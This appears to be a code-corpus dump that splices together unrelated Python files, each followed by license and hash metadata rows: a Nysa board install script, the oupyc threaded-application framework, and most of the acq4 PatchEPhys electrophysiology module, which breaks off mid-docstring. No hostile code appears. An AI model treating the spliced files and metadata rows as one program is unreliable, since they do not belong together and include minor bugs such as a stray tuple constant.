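# Django's migrate command, e.g.:
#
#     python manage.py migrate approvals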
|
apache-2.0
| 4,364,313,000,562,383,000 | 66.355932 | 326 | 0.617011 | false |
CospanDesign/nysa-demo-platform
|
local_install.py
|
1
|
3208
|
#! /usr/bin/python
# Copyright (c) 2015 Dave McCoy (dave.mccoy@cospandesign.com)
#
# Nysa is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# Nysa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Nysa; If not, see <http://www.gnu.org/licenses/>.
import site
import os
import sys
import argparse
import json
import datetime
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
BOARD_NAME = "demo"
PLATFORM_PATH = os.path.abspath(os.path.dirname(__file__))
CONFIG_PATH = os.path.join(PLATFORM_PATH, BOARD_NAME, "board", "config.json")
SCRIPT_NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % SCRIPT_NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("--uninstall",
action="store_true",
help="Uninstall Board Package")
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print "Running Script: %s" % SCRIPT_NAME
#Get the configuration dictionary from the ./board_name/board/config.json
f = open(CONFIG_PATH, "r")
config_dict = json.load(f)
f.close()
name = config_dict["board_name"].lower()
try:
import nysa
except ImportError as e:
print "Nysa Not Installed! install Nysa:"
print "How to install Nysa:"
print "\tsudo apt-get install git verilog gtkwave"
print "\tsudo -H pip install git+https://github.com/CospanDesign/nysa"
print "\tnysa init"
print "\tnysa install-examples all"
print ""
print "Then run this script again"
sys.exit(1)
if args.uninstall:
uninstall_board(name, args.debug)
else:
install_board(name, PLATFORM_PATH, setup_platform = True, debug = args.debug)
def install_board(name, path, setup_platform, debug):
from nysa.ibuilder.lib import utils
from nysa.common.status import Status
status = Status()
if debug:
status.set_level("Verbose")
utils.install_local_board_package(name, path, setup_platform, status)
def uninstall_board(name, debug):
from nysa.ibuilder.lib import utils
from nysa.common.status import Status
status = Status()
if debug:
status.set_level("Verbose")
utils.uninstall_local_board_package(name, status)
if __name__ == "__main__":
main(sys.argv)
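# Example invocations (added; assume Nysa is installed as described above):
#
#     python local_install.py              # install the 'demo' board package
#     python local_install.py -d           # same, with verbose status output
#     python local_install.py --uninstall  # remove the board package again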
|
mit
| -4,583,748,255,007,478,300 | 28.431193 | 85 | 0.645262 | false |
amarin/oupyc
|
oupyc/application/__init__.py
|
1
|
6562
|
# -*- coding: utf-8 -*-
from threading import RLock
from oupyc.application.condition import ConditionGenerator
from oupyc.application.generator import GeneratorThread
from oupyc.application.processor import ProcessorThread
from oupyc.application.router import RouterThread
from oupyc.application.transformer import TransformerThread
from oupyc.queues import FixedSizeQueue
__author__ = 'AMarin'
# -*- coding: utf-8 -*-
import threading
import time
import logging
from abc import ABCMeta, abstractmethod
from oupyc.checks import require_kwarg_type
_l = logging.getLogger(__name__)
_l.setLevel(logging.INFO)
debug, info, warning, error, critical = _l.debug, _l.info, _l.warning, _l.error, _l.critical
GENERATOR="generator"
ROUTER="router",
TRANSFORMER="transformer"
PROCESSOR="processor"
CONDITION="condition"
KNOWN_THREADS = {
GENERATOR: GeneratorThread,
ROUTER: RouterThread,
TRANSFORMER: TransformerThread,
PROCESSOR: ProcessorThread,
CONDITION: ConditionGenerator
}
class ThreadSearchError(Exception):
pass
'''
self._prepare_threads()
def _prepare_threads(self):
if hasattr(self, "_thread_classes") and len(getattr(self, "_thread_classes")):
info("Initiating %s threads", len(self._thread_classes))
for thread_class in self._thread_classes:
debug("Make %s thread", thread_class.description)
thread_instance = thread_class(exit_event=self._exit_event)
self._threads.append(thread_instance)
'''
class ThreadedApplication(object):
def __init__(self, threads, *args, **kwargs):
super(ThreadedApplication, self).__init__()
self._threads = []
self._mutex = RLock()
with self._mutex:
for th in threads:
self._threads.append(th)
self._exit_event = threading.Event()
def add_thread(self, th):
info("Adding thread %s" % th)
th._exit_event = self._exit_event
self._threads.append(th)
def add_threads(self, *threads):
map(lambda th: self.add_thread(th), threads)
def make_thread(self, thread_type, func):
if thread_type in KNOWN_THREADS:
thread_class = KNOWN_THREADS[thread_type]
return thread_class.make(func)
else:
raise ThreadSearchError("Unknown thread type %s, choose one of %s" % (thread_type, KNOWN_THREADS))
def make_gtp_chain(self, *callables):
current_queue = None
max_index = len(callables)-1
with self._mutex:
for func in callables:
idx = callables.index(func)
item = None
if 0 == idx:
# first thread is item generator
item = self.make_thread(GENERATOR, callables[idx])
item.add_queue("result", FixedSizeQueue(size=1))
elif idx < max_index:
# internal threads
item = self.make_thread(TRANSFORMER, callables[idx])
item.set_input(self._threads[-1])
item.add_queue("result", FixedSizeQueue(size=1))
elif idx == max_index:
# last thread is item processor
item = self.make_thread(PROCESSOR, callables[idx])
item.set_input(self._threads[-1])
self.add_thread(item)
def main(self):
""" Main execution process """
info("Starting %s threads", len(self._threads))
for th in self._threads:
if hasattr(th, "get_all_queues"):
for queue in th.get_all_queues():
print("%s %s" % (th.getName(), queue))
for th in self._threads:
debug("%s starting" % th.description)
th.start()
info("%s started", th.description)
info("All internal threads started")
while not self._exit_event.isSet():
pass
def exit_gracefully(self):
""" Gracefull stop """
info("Stopping all threads")
for th in self._threads[::-1]:
info("Waiting %s", th.description)
debug("thread %s[%s]", type(th), th)
th.join(10)
def run(self):
info("Run %s", self.__class__.__name__)
try:
self.main()
except KeyboardInterrupt:
warning("Processing CTRL-C")
self._exit_event.set()
except Exception as exc:
critical(exc)
finally:
info("Exit gracefully")
self.exit_gracefully()
for th in threading._enumerate():
error("Thread %s still active", th)
if not 'MainThread'==th.getName():
th.join(1)
info("Done")
def get_threads_by_class(self, thread_cls):
return filter(lambda x: isinstance(x, thread_cls), self._threads)
def get_threads_by_name(self, thread_name):
return filter(lambda x: thread_name==x.getName(), self._threads)
def get_threads(self, cls_or_name):
""" Get threads filtered by name or class """
return isinstance(cls_or_name, type) \
and self.get_threads_by_class(cls_or_name) \
or self.get_threads_by_name(cls_or_name)
def get_thread(self, cls_or_name):
""" Get single thread with requested name or class. Raises ThreadSearchError if found multiple or nothing"""
_filtered = self.get_threads(cls_or_name)
if 1>len(_filtered):
raise ThreadSearchError("No threads found with class or name %s" % (cls_or_name))
elif 1<len(_filtered):
raise ThreadSearchError("Multiple threads found with class or name %s." % (cls_or_name))
else:
return _filtered[0]
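# Hedged usage sketch (added): wiring a generator -> transformer -> processor
# chain. The exact callable contracts depend on GeneratorThread,
# TransformerThread and ProcessorThread.make() in the sibling modules; the
# three functions below are hypothetical.
#
#     def produce():            # generator step: emits work items
#         return 42
#
#     def double(item):         # transformer step: item in, item out
#         return item * 2
#
#     def consume(item):        # processor step: terminal consumer
#         print(item)
#
#     app = ThreadedApplication(threads=[])
#     app.make_gtp_chain(produce, double, consume)
#     app.run()                 # blocks until CTRL-C, then joins all threads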
class ApplicationWithStatistics(ThreadedApplication):
__metaclass__ = ABCMeta
def __init__(self, threads, *args, **kwargs):
super(ApplicationWithStatistics, self).__init__(threads)
# init statistics subsystem
stat_queue_size = require_kwarg_type('statistics_queue_size', int, kwargs)
import oupyc.inthreads.statistics
stat_thread, stat_aggregate_thread = oupyc.inthreads.statistics.start(
self._exit_event,
stat_queue_size,
stat_queue_size,
lambda x: self.process_stat_record(x)
)
self._threads.insert(0, stat_thread)
self._threads.insert(0, stat_aggregate_thread)
@abstractmethod
def process_stat_record(self, record):
pass
|
gpl-2.0
| -5,474,336,323,609,977,000 | 32.309645 | 116 | 0.594636 | false |
tropp/acq4
|
acq4/analysis/dataModels/PatchEPhys/PatchEPhys.py
|
1
|
32235
|
# -*- coding: utf-8 -*-
import acq4.util.DataManager as DataManager
import acq4.util.SequenceRunner as SequenceRunner
from collections import OrderedDict
import functools
from acq4.util.metaarray import *
import numpy as np
import os
import re
protocolNames = {
'IV Curve': ('cciv.*', 'vciv.*'),
'Photostim Scan': (),
'Photostim Power Series': (),
}
# note: make sure the names, if single, are followed by ',', so as to enforce elements of tuple
deviceNames = {
'Clamp': ('Clamp1', 'Clamp2', 'AxoPatch200', 'AxoProbe', 'MultiClamp1', 'MultiClamp2'),
'Camera': ('Camera',),
'Laser': ('Laser-UV', 'Laser-Blue', 'Laser-2P'),
'LED-Blue': ('LED-Blue',),
}
# current and voltage clamp modes that are know to us
ic_modes = ['IC', 'CC', 'IClamp', 'ic', 'I-Clamp Fast', 'I-Clamp Slow']
vc_modes = ['VC', 'VClamp', 'vc'] # list of VC modes
"""Function library for formalizing the raw data structures used in analysis.
This provides a layer of abstraction between the raw data and the analysis routines.
Should allow simple questions like
Were any scan protocols run under this cell?
Is this a sequence protocol or a single?
Give me a meta-array linking all of the data in a sequence (will have to use hdf5 for this?)
Give me a meta-array of all images from 'Camera' in a sequence (will have to use hdf5 for this?)
Give me the clamp device for this protocol run
tell me the temperature of this run
tell me the holding potential for this clamp data
possibly DB integration?
When did the laser stimulation occur, for how long, and at what power level?
Notes:
Should be able to easily switch to a different data model
"""
def knownClampNames():
return deviceNames['Clamp']
def isSequence(dh):
"""Return true if dh is a directory handle for a protocol sequence."""
return dirType(dh) == 'ProtocolSequence'
#if 'sequenceParams' in dh.info():
#return True
#else:
#return False
def dirType(dh, allowRecurse=True):
"""
Return a string representing the type of data stored in a directory.
Usually, this is provided in the meta-info for the directory, but in a few
cases (old data formats) we need to do a little more probing.
Returns None if the type cannot be determined.
"""
info = dh.info()
type = info.get('dirType', None)
if type is None:
if '__object_type__' in info:
type = info['__object_type__']
elif dh.name()[-5:] == 'Patch':
type = 'Patch'
elif 'protocol' in info:
if 'sequenceParams' in info:
type = 'ProtocolSequence'
else:
type = 'Protocol' ## an individual protocol run, NOT a single run from within a sequence
else:
try:
assert allowRecurse
parent = dh.parent()
if dirType(parent, allowRecurse=False) == 'ProtocolSequence':
type = 'Protocol'
#else:
#raise Exception()
except:
pass
#raise Exception("Can't determine type for dir %s" % dh.name())
return type
def listSequenceParams(dh):
"""Given a directory handle for a protocol sequence, return the dict of sequence parameters"""
try:
return dh.info()['sequenceParams']
except KeyError:
raise Exception("Directory '%s' does not appear to be a protocol sequence." % dh.name())
## what's this for?
#def listWaveGenerator(dh):
# try:
# return dh.info()['waveGeneratorWidget']
# except KeyError:
# raise Exception("Directory '%s' does not appear to be have a wave Generator." % dh.name())
def buildSequenceArray(*args, **kargs):
"""Builds a MetaArray of data compiled across a sequence.
Arguments:
dh: directory handle for the protocol sequence
func: a function (optional) that returns an array or scalar, given a protocol dir handle.
If func is None, return an object array containing the DirHandles (forces join=False)
join: If True (default), attempt to join all results into a single array. This assumes that
func returns arrays of equal shape for every point in the parameter space.
If False, just return an object array pointing to individual results.
truncate: If join=True and some elements differ in shape, truncate to the smallest shape
fill: If join=True, pre-fill the empty array with this value. Any points in the
parameter space with no data will be left with this value.
Example: Return an array of all primary-channel clamp recordings across a sequence
buildSequenceArray(seqDir, lambda protoDir: getClampFile(protoDir).read()['primary'])"""
for i,m in buildSequenceArrayIter(*args, **kargs):
if m is None:
return i
def buildSequenceArrayIter(dh, func=None, join=True, truncate=False, fill=None):
"""Iterator for buildSequenceArray that yields progress updates."""
if func is None:
func = lambda dh: dh
join = False
params = listSequenceParams(dh)
#inds = OrderedDict([(k, range(len(v))) for k,v in params.iteritems()])
#def runFunc(dh, func, params):
#name = '_'.join(['%03d'%n for n in params.values()])
#fh = dh[name]
#return func(fh)
#data = SequenceRunner.runSequence(functools.partial(runFunc, dh, func), inds, inds.keys())
subDirs = dh.subDirs()
if len(subDirs) == 0:
yield None, None
## set up meta-info for sequence axes
seqShape = tuple([len(p) for p in params.itervalues()])
info = [[] for i in range(len(seqShape))]
i = 0
for k,v in params.iteritems():
info[i] = {'name': k, 'values': np.array(v)}
i += 1
## get a data sample
first = func(dh[subDirs[0]])
## build empty MetaArray
if join:
shape = seqShape + first.shape
if isinstance(first, MetaArray):
info = info + first._info
else:
info = info + [[] for i in range(first.ndim+1)]
data = MetaArray(np.empty(shape, first.dtype), info=info)
if fill is not None:
data[:] = fill
else:
shape = seqShape
info = info + []
data = MetaArray(np.empty(shape, object), info=info)
## fill data
i = 0
if join and truncate:
minShape = first.shape
for name in subDirs:
subd = dh[name]
d = func(subd)
minShape = [min(d.shape[j], minShape[j]) for j in range(d.ndim)]
dhInfo = subd.info()
ind = []
for k in params:
ind.append(dhInfo[k])
sl = [slice(0,m) for m in minShape]
ind += sl
data[tuple(ind)] = d[sl]
i += 1
yield i, len(subDirs)
sl = [slice(None)] * len(seqShape)
sl += [slice(0,m) for m in minShape]
data = data[sl]
else:
for name in subDirs:
subd = dh[name]
d = func(subd)
dhInfo = subd.info()
ind = []
for k in params:
ind.append(dhInfo[k])
data[tuple(ind)] = d
i += 1
yield i, len(subDirs)
yield data, None
def getParent(child, parentType):
"""Return the (grand)parent of child that matches parentType"""
if dirType(child) == parentType:
return child
parent = child.parent()
if parent is child:
return None
return getParent(parent, parentType)
def getClampFile(protoDH):
"""
Given a protocol directory handle, return the clamp file handle within.
If there are multiple clamps, only the first one encountered in deviceNames is returned.
Return None if no clamps are found.
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
files = protoDH.ls()
for n in deviceNames['Clamp']:
if n in files:
return protoDH[n]
if n+'.ma' in files:
return protoDH[n+'.ma']
#print 'getClampFile: did not find protocol for clamp: ', files
#print 'valid devices: ', deviceNames['Clamp']
return None
def isClampFile(fh):
if fh.shortName() not in deviceNames['Clamp'] and fh.shortName()[:-3] not in deviceNames['Clamp']:
return False
else:
return True
def getClampCommand(data, generateEmpty=True):
"""Returns the command data from a clamp MetaArray.
If there was no command specified, the function will return all zeros if generateEmpty=True (default)."""
if data.hasColumn('Channel', 'Command'):
return data['Channel': 'Command']
elif data.hasColumn('Channel', 'command'):
return data['Channel': 'command']
else:
if generateEmpty:
tVals = data.xvals('Time')
mode = getClampMode(data)
if 'v' in mode.lower():
units = 'V'
else:
units = 'A'
return MetaArray(np.zeros(tVals.shape), info=[{'name': 'Time', 'values': tVals, 'units': 's'}, {'units': units}])
return None
def getClampPrimary(data):
"""Return primary channel from """
if data.hasColumn('Channel', 'primary'):
return data['Channel': 'primary']
else:
return data['Channel': 'scaled']
def getClampMode(data_handle, dir_handle=None):
"""Given a clamp file handle or MetaArray, return the recording mode."""
if (hasattr(data_handle, 'implements') and data_handle.implements('MetaArray')):
data = data_handle
elif isClampFile(data_handle):
data = data_handle.read(readAllData=False)
else:
raise Exception('%s not a clamp file.' % data)
# if isClampFile(data_handle):
# data = data_handle.read(readAllData=False)
# else:
# data = data_handle
info = data._info[-1]
if 'ClampState' in info:
return info['ClampState']['mode']
else:
try:
mode = info['mode'] # if the mode is in the info (sometimes), return that
return mode
except KeyError:
raise KeyError('PatchEPhys, getClampMode: Cannot determine clamp mode for this data')
# if dir_handle is not None:
# devs = dir_handle.info()['devices'].keys() # get devices in parent directory
# for dev in devs: # for all the devices
# if dev in deviceNames['Clamp']: # are any clamps?
# # print 'device / keys: ', dev, dir_handle.info()['devices'][dev].keys()
# #print 'mode: ', dir_handle.info()['devices'][dev]['mode']
# return dir_handle.info()['devices'][dev]['mode']
# else:
# return 'vc' # None kludge to handle simulations, which don't seem to fully fill the structures.
def getClampHoldingLevel(data_handle):
"""Given a clamp file handle, return the holding level (voltage for VC, current for IC).
TODO: This function should add in the amplifier's internal holding value, if available?
"""
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
p1 = data_handle.parent()
p2 = p1.parent()
if isSequence(p2):
sinfo = p2.info()
else:
sinfo = p1.info()
## There are a few places we could find the holding value, depending on how old the data is
if 'ClampState' in info and 'holding' in info['ClampState']:
return info['ClampState']['holding']
elif 'DAQ' in info and 'command' in info['DAQ'] and 'holding' in info['DAQ']['command']:
return info['DAQ']['command']['holding']
else:
try:
if data_handle.shortName()[-3:] == '.ma':
name = data_handle.shortName()[:-3]
else:
name = data_handle.shortName()
holding = float(sinfo['devices'][name]['holdingSpin']) ## in volts
return holding
except KeyError:
return None
def getClampState(data_handle):
"""
Return the full clamp state
"""
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
if 'ClampState' in info.keys():
return info['ClampState']
else:
return None
def getWCCompSettings(data_handle):
"""
return the compensation settings, if available
Settings are returned as a group in a dictionary
"""
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
d = {}
if 'ClampState' in info.keys() and 'ClampParams' in info['ClampState'].keys():
par = info['ClampState']['ClampParams']
d['WCCompValid'] = True
d['WCEnabled'] = par['WholeCellCompEnable']
d['WCResistance'] = par['WholeCellCompResist']
d['WCCellCap'] = par['WholeCellCompCap']
d['CompEnabled'] = par['RsCompEnable']
d['CompCorrection'] = par['RsCompCorrection']
d['CompBW'] = par['RsCompBandwidth']
return d
else:
        return {'WCCompValid': False, 'WCEnabled': 0, 'WCResistance': 0., 'WCCellCap': 0.,
                'CompEnabled': 0, 'CompCorrection': 0., 'CompBW': 50000.}
def getSampleRate(data_handle):
"""given clamp data, return the data sampling rate """
if not isClampFile(data_handle):
raise Exception('%s not a clamp file.' % data_handle.shortName())
data = data_handle.read(readAllData=False)
info = data._info[-1]
if 'DAQ' in info.keys():
return(info['DAQ']['primary']['rate'])
else:
return(info['rate'])
def getDevices(protoDH):
"""
return a dictionary of all the (recognized) devices and their file handles in the protocol directory
This can be handy to check which devices were recorded during a protocol (the keys of the dictionary)
and for accessing the data (from the file handles)
pbm 5/2014
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
files = protoDH.ls()
devList = {}
for devname in deviceNames.keys():
names = deviceNames[devname]
for n in names:
if n in files:
devList[n] = protoDH[n]
elif n+'.ma' in files:
devList[n] = protoDH[n+'.ma']
else:
pass
if len(devList) == 0:
return None
return devList
def getClampDeviceNames(protoDH):
"""
get the Clamp devices used in the current protocol
:param protoDH: handle to current protocol
:return clampDeviceNames: The names of the clamp devices used in this protocol, or None if no devices
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
files = protoDH.ls()
clampDeviceNames = []
for knownDevName in deviceNames['Clamp']: # go through known devices
if knownDevName in files:
clampDeviceNames.append(knownDevName)
elif knownDevName+'.ma' in files:
clampDeviceNames.append(knownDevName)
else:
pass
if len(clampDeviceNames) == 0:
return None
return clampDeviceNames
def getNamedDeviceFile(protoDH, deviceName):
"""Given a protocol directory handle, return the requested device file handle within.
If there are multiple devices, only the first is returned.
Return None if no matching devices are found.
"""
if protoDH.name()[-8:] == 'DS_Store': ## OS X filesystem puts .DS_Store files in all directories
return None
if deviceName in deviceNames.keys():
names = deviceNames[deviceName]
else:
return None
files = protoDH.ls()
for n in names:
if n in files:
return protoDH[n]
if n+'.ma' in files:
return protoDH[n+'.ma']
return None
def getParentInfo(dh, parentType):
dh = getParent(dh, parentType)
if dh is None:
return None
else:
return dh.info()
def getDayInfo(dh):
return getParentInfo(dh, 'Day')
def getSliceInfo(dh):
return getParentInfo(dh, 'Slice')
def getCellInfo(dh):
return getParentInfo(dh, 'Cell')
def getACSF(dh):
dayInfo = getDayInfo(dh)
if dayInfo is not None:
return dayInfo.get('solution', '')
return None
def getInternalSoln(dh):
dayInfo = getDayInfo(dh)
if dayInfo is not None:
return dayInfo.get('internal', '')
return None
def getTemp(dh):
if dh.isFile():
dh = dh.parent()
temp = dh.info().get(('Temperature','BathTemp'), None)
if temp is None:
dayinfo = getDayInfo(dh)
if dayinfo is not None:
temp = getDayInfo(dh).get('temperature', '')
return temp
def getCellType(dh):
cellInfo = getCellInfo(dh)
if cellInfo is not None:
return cellInfo.get('type', '')
else:
return('Unknown')
def file_cell_protocol(filename):
"""
file_cell_protocol breaks the current filename down and returns a
tuple: (date, sliceid, cell, proto, parent directory)
last argument returned is the rest of the path...
"""
(p0, proto) = os.path.split(filename)
(p1, cell) = os.path.split(p0)
(p2, sliceid) = os.path.split(p1)
(parentdir, date) = os.path.split(p2)
return date, sliceid, cell, proto, parentdir
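# Example (added): for a protocol path such as
# '/data/2014.03.01_000/slice_000/cell_001/CCIV_000', file_cell_protocol returns
# ('2014.03.01_000', 'slice_000', 'cell_001', 'CCIV_000', '/data').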
def cell_summary(dh, summary=None):
"""
cell_summary generates a dictionary of information about the cell
for the selected directory handle (usually a protocol; could be a file)
:param dh: the directory handle for the data, as passed to loadFileRequested
:return summary dictionary:
"""
# other info into a dictionary
if summary is None:
summary = {}
summary['Day'] = getDayInfo(dh)
summary['Slice'] = getSliceInfo(dh)
summary['Cell'] = getCellInfo(dh)
summary['ACSF'] = getACSF(dh)
summary['Internal'] = getInternalSoln(dh)
summary['Temperature'] = getTemp(dh)
summary['CellType'] = getCellType(dh)
today = summary['Day']
if today is not None:
if 'species' in today.keys():
summary['Species'] = today['species']
if 'age' in today.keys():
summary['Age'] = today['age']
if 'sex' in today.keys():
summary['Sex'] = today['sex']
if 'weight' in today.keys():
summary['Weight'] = today['weight']
if 'temperature' in today.keys():
summary['Temperature'] = today['temperature']
if 'description' in today.keys():
summary['Description'] = today['description']
else:
for k in ['species', 'age', 'sex', 'weight', 'temperature', 'description']:
summary[k] = None
if summary['Cell'] is not None:
ct = summary['Cell']['__timestamp__']
else:
ct = 0.
pt = dh.info()['__timestamp__']
summary['ElapsedTime'] = pt - ct # save elapsed time between cell opening and protocol start
(date, sliceid, cell, proto, parentdir) = file_cell_protocol(dh.name())
summary['CellID'] = os.path.join(date, sliceid, cell) # use this as the ID for the cell later on
summary['Protocol'] = proto
return summary
# noinspection PyPep8
class GetClamps():
"""
    Convenience class to read voltage- and current-clamp data from files, including collating data from
    a protocol. The results are stored in instance variables. Handles variations in file structure
    from early versions of Acq4, including returning the stimulus waveforms.
This class will usually be called from the LoadFileRequested routine in an analysis module.
"""
def __init__(self):
pass
def getClampData(self, dh, pars=None):
"""
Read the clamp data - whether it is voltage or current clamp, and put the results
into our class variables.
dh is the file handle (directory)
pars is a structure that provides some control parameters usually set by the GUI
Returns a short dictionary of some values; others are accessed through the class.
Returns None if no data is found.
"""
pars = self.getParsDefaults(pars)
clampInfo = {}
if dh is None:
return None
dirs = dh.subDirs()
clampInfo['dirs'] = dirs
traces = []
cmd = []
cmd_wave = []
data = []
self.time_base = None
self.values = []
self.trace_StartTimes = np.zeros(0)
sequence_values = None
self.sequence = listSequenceParams(dh)
# building command voltages - get amplitudes to clamp
clamp = ('Clamp1', 'Pulse_amplitude')
reps = ('protocol', 'repetitions')
if clamp in self.sequence:
self.clampValues = self.sequence[clamp]
self.nclamp = len(self.clampValues)
if sequence_values is not None:
# noinspection PyUnusedLocal
sequence_values = [x for x in self.clampValues for y in sequence_values]
else:
sequence_values = [x for x in self.clampValues]
else:
sequence_values = []
# nclamp = 0
# if sequence has repeats, build pattern
if reps in self.sequence:
self.repc = self.sequence[reps]
self.nrepc = len(self.repc)
# noinspection PyUnusedLocal
sequence_values = [x for y in range(self.nrepc) for x in sequence_values]
# select subset of data by overriding the directory sequence...
dirs = []
###
### This is possibly broken -
###
###
ld = pars['sequence1']['index']
rd = pars['sequence2']['index']
if ld[0] == -1 and rd[0] == -1:
pass
else:
if ld[0] == -1: # 'All'
ld = range(pars['sequence2']['count'])
if rd[0] == -1: # 'All'
rd = range(pars['sequence2']['count'])
for i in ld:
for j in rd:
dirs.append('%03d_%03d' % (i, j))
### --- end of possibly broken section
for i, directory_name in enumerate(dirs): # dirs has the names of the runs withing the protocol
data_dir_handle = dh[directory_name] # get the directory within the protocol
try:
data_file_handle = getClampFile(data_dir_handle) # get pointer to clamp data
# Check if there is no clamp file for this iteration of the protocol
# Usually this indicates that the protocol was stopped early.
if data_file_handle is None:
print 'PatchEPhys/GetClamps: Missing data in %s, element: %d' % (directory_name, i)
continue
except:
raise Exception("Error loading data for protocol %s:"
% directory_name)
data_file = data_file_handle.read()
self.data_mode = getClampMode(data_file, dir_handle=dh)
if self.data_mode is None:
self.data_mode = ic_modes[0] # set a default mode
if self.data_mode in ['vc']: # should be "AND something" - this is temp fix for Xuying's old data
self.data_mode = vc_modes[0]
if self.data_mode in ['model_ic', 'model_vc']: # lower case means model was run
self.modelmode = True
# Assign scale factors for the different modes to display data rationally
if self.data_mode in ic_modes:
self.command_scale_factor = 1e12
self.command_units = 'pA'
elif self.data_mode in vc_modes:
self.command_units = 'mV'
self.command_scale_factor = 1e3
else: # data mode not known; plot as voltage
self.command_units = 'V'
self.command_scale_factor = 1.0
if pars['limits']:
cval = self.command_scale_factor * sequence_values[i]
cmin = pars['cmin']
cmax = pars['cmax']
if cval < cmin or cval > cmax:
continue # skip adding the data to the arrays
self.devicesUsed = getDevices(data_dir_handle)
self.clampDevices = getClampDeviceNames(data_dir_handle)
self.holding = getClampHoldingLevel(data_file_handle)
self.amplifierSettings = getWCCompSettings(data_file_handle)
self.clampState = getClampState(data_file_handle)
# print self.devicesUsed
cmd = getClampCommand(data_file)
data = getClampPrimary(data_file)
# store primary channel data and read command amplitude
info1 = data.infoCopy()
# we need to handle all the various cases where the data is stored in different parts of the
# "info" structure
if 'startTime' in info1[0].keys():
start_time = info1[0]['startTime']
elif 'startTime' in info1[1].keys():
start_time = info1[1]['startTime']
elif 'startTime' in info1[1]['DAQ']['command'].keys():
start_time = info1[1]['DAQ']['command']['startTime']
else:
start_time = 0.0
self.trace_StartTimes = np.append(self.trace_StartTimes, start_time)
traces.append(data.view(np.ndarray))
cmd_wave.append(cmd.view(np.ndarray))
# pick up and save the sequence values
if len(sequence_values) > 0:
self.values.append(sequence_values[i])
else:
self.values.append(cmd[len(cmd) / 2])
if traces is None or len(traces) == 0:
print "PatchEPhys/GetClamps: No data found in this run..."
return None
self.RSeriesUncomp = 0.
if self.amplifierSettings['WCCompValid']:
            if self.amplifierSettings['WCEnabled'] and self.amplifierSettings['CompEnabled']:
                self.RSeriesUncomp = self.amplifierSettings['WCResistance'] * (1.0 - self.amplifierSettings['CompCorrection'] / 100.)
else:
self.RSeriesUncomp = 0.
# put relative to the start
self.trace_StartTimes -= self.trace_StartTimes[0]
traces = np.vstack(traces)
self.cmd_wave = np.vstack(cmd_wave)
self.time_base = np.array(cmd.xvals('Time'))
self.commandLevels = np.array(self.values)
# set up the selection region correctly and
# prepare IV curves and find spikes
info = [
{'name': 'Command', 'units': cmd.axisUnits(-1),
'values': np.array(self.values)},
data.infoCopy('Time'),
data.infoCopy(-1)]
traces = traces[:len(self.values)]
self.traces = MetaArray(traces, info=info)
# sfreq = self.dataModel.getSampleRate(data_file_handle)
self.sample_interval = 1. / getSampleRate(data_file_handle)
vc_command = data_dir_handle.parent().info()['devices'][self.clampDevices[0]]
self.tstart = 0.01
self.tdur = 0.5
self.tend = 0.510
# print 'vc_command: ', vc_command.keys()
# print vc_command['waveGeneratorWidget'].keys()
if 'waveGeneratorWidget' in vc_command.keys():
# print 'wgwidget'
try:
vc_info = vc_command['waveGeneratorWidget']['stimuli']['Pulse']
# print 'stimuli/Pulse'
pulsestart = vc_info['start']['value']
pulsedur = vc_info['length']['value']
except KeyError:
try:
vc_info = vc_command['waveGeneratorWidget']['function']
# print 'function'
pulse = vc_info[6:-1].split(',')
pulsestart = eval(pulse[0])
pulsedur = eval(pulse[1])
except:
raise Exception('WaveGeneratorWidget not found')
pulsestart = 0.
pulsedur = np.max(self.time_base)
elif 'daqState' in vc_command:
# print 'daqstate'
vc_state = vc_command['daqState']['channels']['command']['waveGeneratorWidget']
func = vc_state['function']
if func == '': # fake values so we can at least look at the data
pulsestart = 0.01
pulsedur = 0.001
else: # regex parse the function string: pulse(100, 1000, amp)
pulsereg = re.compile("(^pulse)\((\d*),\s*(\d*),\s*(\w*)\)")
                match = pulsereg.match(func)
                if match is None:
                    raise Exception('PatchEPhys/GetClamps cannot parse waveGenerator function: %s' % func)
                g = match.groups()
pulsestart = float(g[1]) / 1000. # values coming in are in ms, but need s
pulsedur = float(g[2]) / 1000.
else:
raise Exception("PatchEPhys/GetClamps: cannot find pulse information")
# adjusting pulse start/duration is necessary for early files, where the values
# were stored as msec, rather than sec.
# we do this by checking the values against the time base itself, which is always in seconds.
# if they are too big, we guess (usually correctly) that the values are in the wrong units
if pulsestart + pulsedur > np.max(self.time_base):
pulsestart *= 1e-3
pulsedur *= 1e-3
cmdtimes = np.array([pulsestart, pulsedur])
if pars['KeepT'] is False: # update times with current times.
self.tstart = cmdtimes[0] # cmd.xvals('Time')[cmdtimes[0]]
self.tend = np.sum(cmdtimes) # cmd.xvals('Time')[cmdtimes[1]] + self.tstart
self.tdur = self.tend - self.tstart
clampInfo['PulseWindow'] = [self.tstart, self.tend, self.tdur]
# print 'start/end/dur: ', self.tstart, self.tend, self.tdur
# build the list of command values that are used for the fitting
clampInfo['cmdList'] = []
for i in range(len(self.values)):
clampInfo['cmdList'].append('%8.3f %s' %
(self.command_scale_factor * self.values[i], self.command_units))
if self.data_mode in vc_modes:
self.spikecount = np.zeros(len(np.array(self.values)))
return clampInfo
def getParsDefaults(self, pars):
"""
pars is a dictionary that defines the special cases for getClamps.
